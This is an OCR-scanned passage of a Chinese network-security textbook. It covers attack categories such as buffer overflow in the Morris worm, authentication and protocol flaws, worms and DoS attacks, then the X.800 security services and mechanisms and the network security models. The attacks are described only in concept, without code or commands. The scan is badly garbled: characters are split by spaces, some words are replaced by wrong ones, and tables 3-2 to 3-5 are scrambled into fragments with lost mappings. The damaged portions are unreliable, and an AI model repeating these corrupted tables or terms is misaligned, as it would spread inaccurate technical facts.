及 密码 等 而 被 盗 取 。 不 幸 的 是 ,很 多 人 都 会 上 当 , 因 为 这 个 钓鱼 邮件 可 能 是 自己 的 “朋友 ” 
或 “熟人 "发 送 来 的 。 

(3) 缺陷 和 后 门 攻击 

网 络 蠕虫 传播 的 方式 之 一 是 通过 向 finger 守护 程序 (Daemon) 发 送 新 的 代码 实现 的 。 
显然 ,该 守护 程序 并 不 希望 收 到 这 些 代码 ,但 在 协议 中 没有 限制 接收 这 些 代 码 的 机 制 。 守 
护 程序 的 确 可 以 发 出 一 个 gets 呼叫 ,但 并 没有 指定 最 大 的 缓冲 区 长 度 。 蠕 虫 向 * 读 ?缓冲 
区 内 注入 大 量 的 数据 ,直到 将 gets 堆栈 中 的 返回 地 址 覆盖 。 当 守护 程序 中 的 子 程序 返回 
时 ,就 会 转 而 执行 人 侵 者 写 人 的 代码 。 

缓冲 器 溢出 攻击 也 称 为 “堆栈 粉碎 ”(Stack Smashing) 攻 击 。 这 是 攻击 者 常 采 用 的 一 
种 扰乱 程序 的 攻击 方法 。 长 期 以 来 ,人 们 试图 通过 改进 设计 来 消除 缓冲 器 溢出 缺陷 。 有 
些 计算 机 语言 在 设计 时 就 尽 可 能 不 让 攻击 者 做 到 这 点 。 一 些 硬件 系统 也 尽量 不 在 堆栈 上 
执行 代码 。 此 外 ,一 些 C 编译 器 和 库 函 数 也 使 用 了 许多 对 付 缓冲 器 溢出 攻击 的 方法 。 

所 谓 缺 陷 (Flaws) ,就 是 指 程序 中 的 某 些 代 码 并 不 能 满足 特定 的 要 求 。 尽 管 一 些 程 
序 缺 陷 已 经 由 厂家 逐步 解决 ,但 是 一 些 常见 问题 依然 存在 。 最 佳 解 决 办 法 就 是 在 编写 软 
件 时 ,力求 做 到 准确 、 无 误 。 然 而 ,软件 上 的 缺陷 有 时 是 很 难 避 免 的 ,这 正 是 今天 的 软件 中 
存在 那么 多 缺陷 的 原因 。 

Morris 蠕虫 及 其 许多 现代 变种 给 我 们 的 教训 极为 深刻 ,其 中 最 重要 的 一 点 是 : 缺陷 
导致 的 后 果 并 不 局 限于 产生 不 良 的 效果 或 造成 某 一 特定 服务 的 混乱 ,更 可 怕 的 是 因为 某 
一 部 分 代码 的 错误 而 导致 整个 系统 的 瘫痪 。 当 然 ,没有 人 有 意 要 编写 带 有 缺陷 的 代码 。 
只 要 采取 相应 的 步 又 ,可 以 降低 其 发 生 的 可 能 性 。 

最 后 需要 指出 : 不 要 为 了 追求 效率 而 牺牲 对 程序 正确 性 的 检查 。 如 果 仅 仅 为 了 节约 
JL ns 的 执行 时 间 而 将 程序 设计 得 既 复杂 又 别出心裁 ,并 且 又 需要 特权 , 那 就 错 了 。 现 在 
的 计算 机 硬件 速度 越 来 越 高 ,节约 的 这 点 时 间 毫 无 价值 。 一旦 出 现 安全 问题 ,在 清除 入 侵 
上 所 花费 的 时 间 和 付出 的 代价 将 是 非常 巨大 的 。 

(4) 认证 失效 

许多 攻击 的 成 功 都 可 归结 于 认证 机 制 的 失效 。 即 使 一 个 安全 机 制 再 好 ,也 存在 遭受 
攻击 的 可 能 性 。 例 如 ,一 个 源 地 址 有 效 性 的 验证 机 制 ,在 某 些 应 用 场合 (如 有 防火 墙 地 址 
过 滤 时 ) 能 够 发 挥 作用 ,但 是 黑客 可 以 使 用 rpcbind 重 发 某 些 请 求 。 在 这 种 情况 下 ,最 终 
的 服务 器 就 会 被 欺骗 。 对 于 这 些 服务 器 来 说 ,这 些 消 息 看 起 来 好 像 源 于 本 地 ,但 实际 上 来 
自 其 他 地 方 。 

如 果 源 机 器 是 不 可 信 的 ,基于 地 址 的 认证 也 会 失效 。 虽 然 人 们 可 以 采用 口令 机 制 来 
控制 自己 的 计算 机 ,但 是 口令 失窃 也 是 常见 的 。 窃 听 者 可 以 很 容易 地 从 未 加 密 的 会 话 中 
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获得 明文 的 口令 ,有 时 也 可 能 对 某 些 一 次 口令 方案 发 起 攻击 。 对 于 一 个 好 的 认证 方案 来 
说 ,下 次 登录 必须 具有 唯一 的 有 效 口令 。 有 时 攻击 者 会 将 自己 置 于 客户 机 和 服务 器 中 间 ， 
它 仅仅 转发 服务 器 对 客户 机 发 出 的 “挑战 "(challenge, 实 际 上 为 一 随机 数 ) ,并 从 客户 机 获 
得 一 个 正确 的 “响应 ”*"。 此 时 ,攻击 者 可 以 采用 此 “响应 ”信息 登录 服务 器 。 有 关 此 类 攻击 
可 参见 相关 文献 。 

(5) 协议 缺陷 

前 面 讨 论 的 是 在 系统 完全 正常 工作 的 情况 下 发 生 的 攻击 。 但 是 ,有 些 认证 协议 本 身 
就 有 安全 缺陷 ,这 些 缺 陷 的 存在 会 直接 导致 攻击 的 发 生 。 

例如 ,攻击 者 可 对 TCP 发 起 序列 号 攻击 。 由 于 在 建立 连接 时 所 生成 的 初始 序列 号 的 
随机 性 不 够 ,攻击 者 很 可 能 发 起 源 地 址 欺骗 攻击 。 为 了 做 到 公平 .TCP 的 序列 号 在 设计 
时 并 没有 考虑 抵御 恶意 的 攻击 。 其 他 基于 序列 号 认证 的 协议 也 可 能 遭受 同样 的 攻击 。 这 
样 的 协议 有 很 多 ,如 DNS 和 许多 基于 RPC 的 协议 。 

在 密码 学 中 ,如 何 发 现 协 议 中 存在 的 安全 漏洞 是 非常 重要 的 研究 课题 。 有 时 错误 是 
由 协议 的 设计 者 无 意 造 成 的 ,但 更 多 的 安全 漏洞 是 由 不 同 的 安全 假设 所 引发 的 。 对 密码 
协议 的 安全 性 进行 证 明 非 常 困难 ,人 们 正在 加 强 这 方面 的 研究 工作 。 现 在 ,各 种 学 术 刊 
物 .安全 公司 网 站 和 操作 系统 开发 商 经 常 公布 一 些 新 发 现 的 安全 漏洞 ,我们 必须 对 此 加 以 
重视 。 

802.11 无 线 数据 通信 标准 中 的 WEP 在 设计 上 也 存在 缺陷 。 目 前 ,针对 WEP 的 攻击 
软件 在 网 络 上 随处 可 见 。 这 一 切 说 明 ,真正 的 安全 是 很 难 做 到 的 。 工 程 师 在 设计 密码 协 
议 时 ,应 当 多 向 密码 学 家 咨询 ,而 不 是 随意 设计 。 信 息 安 全 对 人 的 技术 素质 要 求 非常 高 ， 
没有 进行 专业 学 习 和 受过 专门 培训 的 人 员 很 难 胜任 此 项 工作 。 

(6) 信息 泄露 

许多 协议 都 会 丢失 一 些 信息 ,这 就 给 那些 想 要 使 用 该 服务 的 攻击 者 提供 了 可 乘 之 机 。 
这 些 信息 可 能 成 为 商业 间谍 窃取 的 目标 ,攻击 者 也 可 借助 这 些 信息 攻破 系统 。Finger 协 
议 就 是 这 样 一 个 例子 。 这 些 信息 除了 可 以 用 于 口令 猜测 之 外 ,还 可 以 用 来 进行 欺骗 攻击 。 

另 一 个 丰富 的 数据 来 源 是 DNS。 在 这 里 ,黑客 可 以 获得 从 公司 的 组 织 结构 到 目标 用 
户 的 非常 有 价值 的 数据 。 要 控制 数据 的 流出 是 非常 困难 的 ,唯一 的 办 法 是 对 外 部 可 见 的 
DNS 加 以 限制 ,使 其 仅 提供 网 关机 器 的 地 址 列表 。 

精明 的 黑客 当然 深 详 其 理 , 他 根本 不 需要 你 说 出 有 哪些 机 器 存在 。 他 只 须 进行 端口 
号 和 地 址 空间 扫描 ,就 可 寻找 感 兴趣 的 服务 和 隐藏 的 主机 。 这 里 ,对 DNS 进行 保护 的 最 
佳 防 护 措施 是 使 用 防火 墙 。 如 果 黑 客 不 能 向 某 一 主机 发 送 数据 包 , 他 也 就 不 能 侵入 该 主 
机 并 获取 有 价值 的 信息 。 

CD 指数 攻击 一 一 病毒 和 蠕虫 

指数 攻击 能 够 使 用 程序 快速 复制 并 传播 攻击 。 当 程序 自行 传播 时 ,这 些 程序 称 为 蠕 
虫 (Worms); 当 它们 依附 于 其 他 程序 传播 时 ,这 些 程序 就 叫 作 病毒 。 病 毒 传播 的 数学 模 
型 是 相似 的 ,病毒 的 流行 传播 与 生物 感染 病毒 非常 相似 。 

这 些 程序 利用 在 很 多 系统 或 用 户 中 普遍 存在 的 缺陷 和 不 良 行为 获得 成 功 。 它 们 可 以 
在 几 小 时 或 几 分 钟 之 内 扩散 到 全 世界 ,从 而 使 许多 机 构 蒙 受 巨 大 损失 。Melissa 蠕虫 能 
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阻塞 基于 微软 软件 的 电子 邮件 系统 达 5 天 之 久 。 各 种 各 样 的 蠕虫 给 Internet 造成 巨大 的 
负担 。 这 些 程序 本 身 更 倾向 于 攻击 随机 的 目标 ,而 不 是 针对 特定 的 个 人 或 机 构 。 但 是 , 它 
们 所 携带 的 某 些 代码 却 可 能 对 那些 著名 的 政治 目标 或 商业 目标 发 起 攻击 。 

对 于 已 知 的 计算 机 病毒 ,采用 流行 的 查 杀 病 毒 软件 来 清除 非常 有 效 。 但 是 这 些 软件 
必须 经 常 升级 ,因为 病毒 的 制造 者 和 杀毒 软件 厂商 之 间 正 进行 着 一 场 较量 。 现 在 ,病毒 隐 
藏 的 隐蔽 性 越 来 越 高 ,使 得 杀毒 软件 不 青 局 限于 在 可 执行 代码 中 寻找 某 些 字符 串 。 它 们 
必须 能 够 仿效 这 些 代码 并 寻找 滤 过 性 病毒 的 行为 特征 。 由 于 病毒 越 来 越 难以 发 现 ,病毒 
检测 软件 就 不 得 不 花 更 多 的 时 间 来 检查 每 个 文件 ,有 时 所 花费 的 时 间 会 很 长 。 病 毒 的 制 
造 者 可 能 会 巧妙 地 设计 代码 ,使 杀毒 软件 在 一 定 的 时 间 内 不 能 识别 出 来 。 

(8) 拒绝 服务 攻击 

在 前 面 讨论 的 攻击 方式 中 ,大 多 数 是 基于 协议 的 弱点 、 服 务 器 软件 的 缺陷 和 人 为 因素 
而 实施 的 。 拒 绝 服 务 (Denial-of-Service,DoS) 攻 击 则 不 同 , 它 是 通过 过 度 使 用 服务 ,使 网 
络 连接 数 超出 其 可 以 承受 的 并 发 连接 数 ,从 而 造成 自动 关机 或 系统 瘫痪 ,或 降低 服务 质 
量 。 这 种 攻击 通常 不 会 造成 文件 删除 或 数据 丢失 ,因此 是 一 种 比较 温和 的 攻击 。 

这 类 攻击 往往 比较 容易 发 现 。 例 如 ,关闭 一 个 服务 很 容易 被 检测 并 发 现 。 尽 管 攻 击 
很 容易 暴露 ,但 要 找到 攻击 的 源头 却 十 分 困难 。 这 类 攻击 往往 生成 伪装 的 数据 包 , 其 中 含 
有 随机 和 无 效 的 返回 地 址 。 

分 布 式 拒绝 服务 (Distributed Denial-of-Service,DDoS) 攻 击 使 用 很 多 Internet 主机 ， 
同时 向 某 个 目标 发 起 攻击 。 通 常 ,参与 攻击 的 主机 却 不 明 不 白地 成 为 攻击 者 的 帮凶 。 这 
些 主机 可 能 已 经 被 攻击 者 攻破 ,或 者 被 植 人 恶意 的 木马 。DDoS 攻击 通常 难以 恢复 ,因为 
攻击 有 可 能 来 自 世界 各 地 。 

目前 ,黑客 采用 DDoS 攻击 成 功 地 攻击 了 几 个 著名 的 网 站 ,如 Yahoo、 微 软 及 SCO 
等 ,已 经 引起 广泛 关注 。DDoS 其 实 是 DoS 攻击 的 一 种 ,不 同 的 是 它 能 够 使 用 许多 台 计 算 
机 通过 网 络 同时 对 某 个 网 站 发 起 攻击 。 


3.1.4 开放 系统 互 连 模型 与 安全 体系 结构 


研究 信息 系统 安全 体系 结构 的 目的 ,就 是 将 普遍 性 的 安全 理论 与 实际 信息 系统 相 结 开放 系统 
合 , 形 成 满足 信息 系统 安全 需求 的 安全 体系 结构 。 应 用 安全 体系 结构 的 目的 ,就 是 从 管理 与 安全 体 
上 和 技术 上 保证 完整 ,准确 地 实现 安全 策略 ,满足 安全 需求 。 开 放 系 统 互 连 (Open 系 结构 
System Interconnection ,OSI) 安 全 体系 结构 定义 了 必需 的 安全 服务 .安全 机 制 和 技术 管 
理 , 以 及 它们 在 系统 上 的 合理 部 署 和 关系 配置 。 

由 于 基于 计算 机 网 络 的 信息 系统 以 开放 系统 Internet 为 支撑 平台 ,因此 本 节 重 点 讨 
论 开 放 系 统 互 连 安全 体系 结构 。 

OSI 安全 体系 结构 的 研究 始 于 1982 年 ,当时 ISO 基本 参考 模型 刚刚 确立 。 这 项 工 
作 是 由 ISO/IEC JTC1/SC21 完成 的 。 国际 标准 化 组 织 (ISO) 于 1988 年 发 布 了 
ISO 7498-2 标准 ,作为 OSI 基本 参考 模型 的 新 补充 。1990 年 ,国际 电信 联盟 
(International Telecommunication Union ,ITU) 决 定 采 用 ISO 7498-2 作为 其 X.800 推荐 
标准 。 因 此 ,X.800 和 ISO 7498-2 标准 基本 相同 。 
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我 国 的 国家 标准 (信息 处 理 系 统 开放 系统 互 连 基 本 参考 模型 一 一 第 二 部 分 : 安全 
体系 结构 》(GB/T9387.2 一 1995) (等 同 于 ISO 7498-2) 和 《Internet 安全 体系 结构 》(RFC 
2401) 中 提 到 的 安全 体系 结构 是 两 个 普遍 适用 的 安全 体系 结构 ,用 于 保证 在 开放 系统 
中 进程 与 进程 之 间 远 距离 安全 交换 信息 。 这 些 标准 确立 了 与 安全 体系 结构 有 关 的 一 
般 要 素 ,适用 于 开放 系统 之 间 需 要 通信 保护 的 各 种 场合 。 这 些 标准 在 参考 模型 的 框架 
内 建立 起 一 些 指导 原则 与 约束 条 件 ,从 而 提供 了 解决 开放 互 连 系统 中 安全 问题 的 统一 
Jk. 

下 面 重点 介绍 安全 体系 结构 中 所 定义 的 安全 服务 和 安全 机 制 及 两 者 之 间 的 关系 。 


1. 安全 服务 
X.800 对 安全 服务 做 出 定义 : 为 了 保证 系统 或 数据 传输 有 足够 的 安全 性 ,开放 系统 
通信 协议 所 提供 的 服务 。RFC2828 也 对 安全 服务 做 出 了 更 加 明确 的 定义 : 安全 服务 是 一 
种 由 系统 提供 的 对 资源 进行 特殊 保护 的 进程 或 通信 服务 。 安 全 服务 通过 安全 机 制 来 实现 
安全 策略 。X.800 将 这 些 服 务 分 为 5 类 , 共 14 个 特定 服务 ,如 表 3-2 所 示 。 这 5 类 安全 服 
务 将 在 后 面 逐 一 进行 讨论 。 
表 3-2 X.800 定义 的 5 类 安全 服务 


分 类 特定 服务 内 * 
"T -逻辑 连接 建立 传输 阶段 ,为 该 连 
认证 (确保 通信 实体 | 同等 实体 认证 人 为 该 连接 的 实体 的 
就 是 它 所 声称 的 实 - 
体 ) 数据 源 点 认证 在 无 连接 传输 时 ,保证 收 到 的 信息 来 源 是 所 声称 的 来 源 
防止 对 资源 的 非 授权 访问 ,包括 防止 以 非 授权 的 方式 使 
访问 控制 用 某 一 资源 。 这 种 访问 控制 要 与 不 同 的 安全 策略 协调 
一 臻 
连接 保密 性 保护 一 次 连接 中 所 有 的 用 户 数据 
数据 保密 性 (保护 数 | 无 连接 保密 性 保护 单个 数据 单元 里 的 所 有 用 户 数据 
据 , 使 之 不 被 非 授权 和 一 次 连接 或 彰 个 数据 单元 里 3 部 分 提供 保 
x Esame aa 
流量 保密 性 保护 那些 可 以 通过 观察 流量 而 获得 的 信息 
具有 恢复 功能 的 连 | 提供 一 次 连接 中 所 有 用 户 数据 的 完整 性 。 检 测 整 个 数据 
接 完整 性 序列 内 存在 的 修改 、 插 入 、 删 除 或 重 发 , 且 试 图 将 其 恢复 
数据 完整 性 (保证 接 | 无 恢复 功能 的 连接 | 同 具 有 恢复 功能 的 连接 完整 性 基本 一 致 ,但 仅 提供 检测 ， 
收 到 的 数据 确实 是 授 | 完整 性 无 恢复 功能 
权 实 体 发 出 的 数据 ， 提供 一 次 连接 中 传输 的 单个 数据 单元 用 户 数据 中 选 定 部 
即 没有 修改 ,插入 、 删 “选择 域 连接 完整 性 | 分 的 数据 完整 性 ,并 判断 选 定 域 是 否 有 修改 、 插 入、 删除 
除 或 重 发 ) 或 重 发 
"eI 为 单个 无 连接 数据 单元 提供 完整 性 保护 ;判断 选 定 域 是 
无 连接 完整 性 否 被 修改 
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续 表 
分 类 特定 服务 内 容 
不 可 否认 性 (防止 整 | 二 "" | od 
个 或 部 分 过 人 站 各 | 源 点 的 不 可 否认 性 | 证 明 消息 由 特定 的 一 广发 
中 ,任意 一 个 通信 实 


体 进 行 耕 认 的 行为 ) | 信 宿 的 不 可 否认 性 | 证 明 消息 被 特定 方 收 到 


(1) 认证 

认证 服务 与 保证 通信 的 真实 性 有 关 。 在 单条 消息 下 ,如 一 条 警告 或 报警 信号 认证 服 
务 是 向 接收 方 保证 消息 来 自 所 声称 的 发 送 方 。 对 于 正在 进行 的 交互 ,如 终端 和 主机 连接 ， 
就 涉及 两 个 方面 的 问题 : 首先 ,在 连接 的 初始 化 阶段 ,认证 服务 保证 两 个 实体 是 可 信 的 ， 
也 就 是 说 ,每 个 实体 都 是 它们 所 声称 的 实体 ;其 次 ,认证 服务 必须 保证 该 连接 不 受 第 三 方 
的 干扰 ,例如 ,第 三 方 能 够 伪装 成 两 个 合法 实体 中 的 一 方 , 进 行 非 授权 的 传输 或 接收 。 

该 标准 还 定义 了 如 下 两 个 特殊 的 认证 服务 : 

C 同等 实体 认证 。 用 于 在 连接 建立 或 数据 传输 阶段 为 连接 中 的 同等 实体 提供 身份 
确认 。 该 服务 提供 这 样 的 保证 : 一 个 实体 不 能 实现 伪装 成 另外 一 个 实体 或 对 上 次 连接 的 
消息 进行 非 授 权重 发 的 企图 。 

@ 数据 源 认 证 。 为 数据 的 来 源 提供 确认 ,但 对 数据 的 复制 或 修改 不 提供 保护 。 这 种 
服务 支持 电子 邮件 这 种 类 型 的 应 用 。 在 这 种 应 用 下 .通信 实体 之 间 没 有 任何 预先 的 交互 。 

(2) 访问 控制 

在 网 络 安全 中 ,访问 控制 对 那些 通过 通信 连接 对 主机 和 应 用 的 访问 进行 限制 和 控制 。 
这 种 保护 服务 可 应 用 于 对 资源 的 各 种 不 同类 型 的 访问 。 例 如 ,这 些 访问 包括 使 用 通信 资 
源 、 读 写 或 删除 信息 资源 或 处 理 信息 资源 的 操作 。 为 此 ,每 个 试图 获得 访问 控制 权限 的 实 
体 必须 在 经 过 认证 或 识别 之 后 ,才能 获取 其 相应 的 访问 控制 权限 。 

(3) 数据 保密 性 

保密 性 是 防止 传输 的 数据 遭 到 诸如 窃听 流量 分 析 等 被 动 攻击 。 对 于 数据 传输 ,可 以 
提供 多 层 的 保护 。 最 常 使 用 的 方法 是 在 某 个 时 间 段 内 对 两 个 用 户 之 间 所 传输 的 所 有 用 户 
数据 提供 保护 。 例 如 , 若 两 个 系统 之 间 建 立 了 TCP 连接 ,这 种 最 通用 的 保护 措施 可 以 防 
止 在 TCP 连接 上 传输 用 户 数据 的 泄露 。 此 外 ,还 可 以 采用 一 种 更 特殊 的 保密 性 服务 , 它 
可 以 对 单条 消息 或 对 单条 消息 中 的 某 个 特定 的 区 域 提供 保护 。 这 种 特殊 的 保护 措施 与 普 
通 的 保护 措施 相 比 ,所 使 用 的 场合 更 少 ,而 且 实现 起 来 更 复杂 、 更 昂贵。 

保密 性 的 另外 一 个 用 途 是 防止 流量 分 析 。 它 可 以 使 攻击 者 观察 不 到 消息 的 信 源 和 信 
f LS .长 度 或 通信 设施 上 的 其 他 流量 特征 。 

(4) 数据 完整 性 

与 数据 的 保密 性 相 比 ,数据 完整 性 可 以 应 用 于 消息 流 .单条 消息 或 消息 的 选 定 部 分 。 
同样 ,最 常用 和 直接 的 方法 是 对 整个 数据 流 提 供 保护 。 

面向 连接 的 完整 性 服务 保证 收 到 的 消息 和 发 出 的 消息 一 致 ,不 存在 对 消息 进行 复制 、 
插入 、 修 改 、 倒 序 、 重 发 和 破坏 。 因 此 .面向 连接 的 完整 性 服务 也 能 够 解决 消息 流 的 修改 和 
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拒绝 服务 两 个 问题 。 另 一 方面 ,用 于 处 理 单条 消息 的 无 连接 完整 性 服务 通常 仅 防止 对 单 
条 消息 的 修改 。 

另外 ,还 可 以 区 分 有 恢复 功能 的 完整 性 服务 和 无 恢复 功能 的 完整 性 服务 。 因 为 数据 
完整 性 的 破坏 与 主动 攻击 有 关 , 所 以 重点 在 于 检测 而 不 是 阻止 攻击 。 如 果 检 测 到 完整 性 
遭 到 破坏 ,那么 完整 性 服务 能 够 报告 这 种 破坏 ,并 通过 软件 或 人 工 干 预 的 办 法 来 恢复 被 破 
坏 的 部 分 。 在 后 面 可 以 看 到 ,有 些 安全 机 制 可 以 用 来 恢复 数据 的 完整 性 。 通 常 , 自 动 恢复 
机 制 是 一 种 非常 好 的 选择 。 

(5) 不 可 否认 性 

不 可 否认 性 防止 发 送 方 或 接收 方 否认 传输 或 接收 过 某 条 消息 。 因 此 , 当 消 息 发 出 后 ， 
接收 方 能 证 明 消息 是 由 所 声称 的 发 送 方 发 出 的 。 同 样 , 当 消息 接收 后 ,发 送 方 能 证 明 消息 
确实 是 由 所 声称 的 接收 方 收 到 的 。 

(6) 可 用 性 服务 

X.800 和 RFC2828 对 可 用 性 的 定义 是 : 根据 系统 的 性 能 说 明 , 能 够 按照 系统 所 授权 
的 实体 的 要 求 对 系统 或 系统 资源 进行 访问 。 也 就 是 说 , 当 用 户 请 求 服务 时 ,如 果 系 统 设计 
时 能 够 提供 这 些 服务 , 则 系统 是 可 用 的 。 许 多 攻击 可 能 导致 可 用 性 的 损失 或 降低 。 可 以 
采取 一 些 自 动 防御 措施 (如 认证 ,加密 等 ) 来 对 付 这 些 攻击 。 

X.800 将 可 用 性 看 作 是 与 其 他 安全 服务 相关 的 性 质 。 但 是 ,对 可 用 性 服务 进行 单独 
说 明 很 有 意义 。 可 用 性 服务 能 够 确保 系统 的 可 用 性 ,能 够 对 付 由 拒绝 服务 攻击 引起 的 安 
全 问题 。 由 于 它 依赖 于 对 系统 资源 的 恰当 管理 和 控制 ,因此 它 依赖 于 访问 控制 和 其 他 安 
全 服务 。 


2. 安全 机 制 
表 3-3 列 出 了 X.800 定义 的 安全 机 制 。 由 表 可 知 ,这 些 安全 机 制 可 以 分 成 两 类 . 一 
类 在 特定 的 协议 层 实现 , 另 一 类 不 属于 任何 的 协议 层 或 安全 服务 。 前 一 类 被 称 为 特定 安 
全 机 制 , 共 有 8 种 ;后 一 类 被 称 为 普遍 安全 机 制 ,共有 5 种 。 
表 3-3 X.800 定义 的 安全 机 制 
分 类 内 容 
运用 数学 算法 将 数据 转换 成 不 可 知 的 形式 。 数 据 的 变换 和 复原 依 
赖 于 算法 和 一 个 或 多 个 加 密 密 钥 
附加 于 数据 单元 之 后 的 数据 , 它 是 对 数据 单元 的 密码 变换 ,可 使 接 
收 方 证 明 数据 的 来 源 和 完整 性 ,并 防止 伪造 
特定 安全 机 制 | 访问 控制 对 资源 实施 访问 控制 的 各 种 机 制 
(可 以 嵌入 合 适 uc xWrEI "pnm 
的 协议 层 以 提供 | 数据 完整 性 | 用 于 保证 数据 元 或 数据 流 的 完整 性 的 各 种 机 制 
一 些 OSI 安全 | 认证 交换 通过 信息 交换 来 保证 实体 身份 的 各 种 机 制 
服务 ) 
流量 填充 在 数据 流 空隙 中 插入 若干 位 以 阻止 流量 分 析 
能 够 为 某 些 数据 动态 地 或 预定 地 选取 路 由 ,确保 只 使 用 物理 上 安 
全 的 子 网 络 .中继站 或 链 路 


公证 利用 可 信 的 第 三 方 来 保证 数据 交换 的 某 些 性 质 


加 密 


数字 签名 


路 由 控制 
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续 表 
分 x 内 容 
sry | 根据 某 些 标准 (如 安全 策略 所 设立 的 标准 ) 被 认为 是 正确 的 ,就 是 
可 信 的 
壮志 安全 册 侧 | 安全 标志 | 资源 (可 能 是 数据 元 ) 的 标志 ,以 指明 该 资源 的 属性 
(不 局 限于 任何 | 事件 检测 。 | 检测 与 安全 相关 的 事件 
OSI 安全 服务 或 | 生计 跟 踪 | 收集 潜在 可 用 于 安全 审计 的 数据 ,以 便 对 系统 的 记录 和 活动 进行 
协议 层 的 机 制 ) 独立 地 观察 和 检查 
处 理 来 自 诸如 事件 处 置 与 管理 功能 等 安全 机 制 的 请 求 ,并 采取 恢 
安全 恢复 。 | 复 措施 
月 


3. 安全 服务 与 安全 机 制 的 关系 
根据 X.800 的 定义 ,安全 服务 与 安全 机 制 之 间 的 关系 如 表 3-4 所 示 。 该 表 详 细 说 明 
了 实现 某 种 安全 服务 应 该 采用 哪些 安全 机 制 。 


表 3-4 安全 服务 与 安全 机 制 之 间 的 关系 


安全 服务 “| 加 密 | 数字 签名 


访问 控制 | 数据 完整 性 | 认证 交换 | 流量 填充 | 路 由 控制 | 公证 


对 等 实体 认证 | Y Y 


Y 


数据 源 认 证 


访问 控制 


保密 性 


流量 保密 性 


数据 完整 性 


Y 


不 可 否认 性 


Y x 


可 用 性 


Y Y 


ik: Y 表示 该 安全 机 制 适合 提供 该 种 安全 服务 ,空格 表示 该 安全 机 制 不 适合 提供 该 种 安全 服务 。 


4. 在 OSI 层 中 的 服务 配置 
OSI 安全 体系 结构 最 重要 的 贡献 是 总 结 了 各 种 安全 服务 在 OSI 参考 模型 的 7 层 中 
的 适当 配置 。 安 全 服务 与 协议 层 之 间 的 关系 如 表 3-5 所 示 。 


表 3-5 安全 服务 与 协议 层 之 间 的 关系 


协 议 层 
安全 服务 
1 2 3 4 5 6 7 
对 等 实体 认证 Y Y Y 
数据 源 点 认证 Y Y Y 
访问 控制 Y Y Y 
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安全 服务 


- 
~ 
o 
€ 
a 
o 
E 


连接 保密 性 Y 
无 连接 保密 性 Y 
选择 域 保密 性 
流量 保密 性 Y 
具有 恢复 功能 的 连接 完整 性 X Y 
不 具有 恢复 功能 的 连接 完整 性 
选择 域 有 连接 完整 性 Y 
无 连接 完整 性 
选择 域 无 连接 完整 性 Y Y 
源 点 的 不 可 否认 
信 宿 的 不 可 否认 


< xxxiex 


ik. Y 表示 该 服务 应 该 在 相应 的 层 中 提供 ,空格 表示 不 提供 。 第 7 层 必 须 提 供 所 有 的 安全 服务 。 


3.1.5 网 络 安全 模型 


一 个 最 广泛 采用 的 网 络 安全 模型 如 图 3-4 所 示 。 通 信 一 方 要 通过 Internet 将 消息 传 
送 给 另 一 方 ,那么 通信 双方 (也 称 为 交互 的 主体 ) 必 须 通过 执行 严格 的 通信 协议 来 共同 完 
成 消息 交换 。 在 Internet 上 ,通信 双方 要 建立 一 条 从 信 源 到 信 宿 的 路 由 ,并 共同 使 用 通信 
协议 (如 TCP/IP) 来 建立 逻辑 信息 通道 。 

从 图 3-4 中 可 知 ,一 个 网 络 安全 模型 通常 由 6 个 功能 实体 组 成 ,它们 分 别 是 消息 的 发 
送 方 ( 信 源 ) ,消息 的 接收 方 (信和 宿 ) 、 安 全 变换 ,信息 通道 ,可 信 的 第 三 方 和 攻击 者 。 


可 信 的 第 三 方 


(如 仲裁 者 、 秘 密 信息 的 分 配 者 
m E ay 


信息 通道 | 安 
| 合 
消 
息 | 


攻击 者 
图 3-4 网 络 安全 模型 


ünzEbpy 


在 需要 保护 信息 传输 以 防 攻击 者 威胁 消息 的 保密 性 .真实 性 和 完整 性 时 ,就 会 涉及 信 
息 安全 ,任何 用 来 保证 信息 安全 的 方法 都 包含 如 下 两 个 方面 : 
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CD 对 被 发 送信 息 进行 安全 相关 的 变换 。 例 如 对 消息 加 密 , 它 打 乱 消息 使 得 攻击 者 不 
能 读 懂 消息 ,或 者 将 基于 消息 的 编码 附 于 消息 后 ,用 于 验证 发 送 方 的 身份 。 

@ 使 通信 双方 共享 某 些 秘密 信息 ,而 这 些 消 息 不 为 攻击 者 所 知 。 例 如 加 密 和 解密 密 
钥 , 在 发 送 端 加 密 算法 采用 加 密 密 钥 对 所 发 送 的 消息 加 密 , 而 在 接收 端 解密 算法 采用 解密 
密 钥 对 收 到 的 密 文 解密 。 

图 3-4 中 的 安全 变换 就 是 密码 学 课程 中 所 学 习 的 各 种 密码 算法 。 安 全 信息 通道 的 建 
立 可 以 采用 密 钥 管理 技术 和 后 面 即将 讨论 的 VPN 技术 实现 。 为 了 实现 安全 传输 ,需要 
有 可 信 的 第 三 方 。 例 如 ,第 三 方 负责 将 秘密 信息 分 配给 通信 双方 ,而 对 攻击 者 保密 ,或 者 
当 通 信 双 方 就 关于 信息 传输 的 真实 性 发 生 争执 时 ,由 可 信 第 三 方 来 仲裁 。 

网 络 安全 模型 说 明 ,设计 安全 服务 应 包含 以 下 4 个 方面 内 容 : 

QD 设计 一 个 算法 , 它 执行 与 安全 相关 的 变换 ,该 算法 应 是 攻击 者 无 法 攻破 的 。 

@ 产生 算法 所 使 用 的 秘密 信息 。 

@ 设计 分 配 和 共享 秘密 信息 的 方法 。 

@ 指明 通信 双方 使 用 的 协议 ,该 协议 利用 安全 算法 和 秘密 信息 实现 安全 服务 。 

前 面 讨论 的 安全 服务 和 安全 机 制 基本 上 均 遵 循 图 3-4 所 示 的 网 络 安全 模型 。 但 是 ， 
还 有 一 些 安全 应 用 方案 不 完全 符合 该 模型 ,它们 遵循 图 3-5 所 示 的 网 络 访问 安全 模型 。 
该 模型 希望 保护 信息 系统 不 受 有 害 的 访问 。 大 多 数 读者 都 熟悉 黑客 引起 的 问题 ,黑客 试 
图 通过 网 络 渗入 到 可 访问 的 系统 。 有 时 他 可 能 没有 恶意 ,只 是 对 非法 闻 入 计算 机 系统 有 
一 种 满足 感 ; 或 者 人 侵 者 可 能 是 一 个 对 公司 不 满 的 员工 , 想 破坏 公司 的 信息 系统 以 发 泄 自 
己 的 不 满 ; 或 者 和 人 侵 者 是 一 个 罪犯 , 想 利用 计算 机 网 络 来 获取 非法 的 利益 (如 获取 信用 卡 
号 或 进行 非法 的 资金 转账 ) 。 


信息 系统 
计算 机 资源 
— “| (处 理 器 、 内 存 、1/0) 
一 人 (如 黑客 ) — (mm) 数据 
一 -软件 (如 病毒 、 蠕 虫 ) ”访问 通道 人 
门卫 功能 此 
内 部 安全 控制 


图 3-5 网 络 访问 安全 模型 


32 网络 安全 防护 技术 


3.2.1 防火 墙 


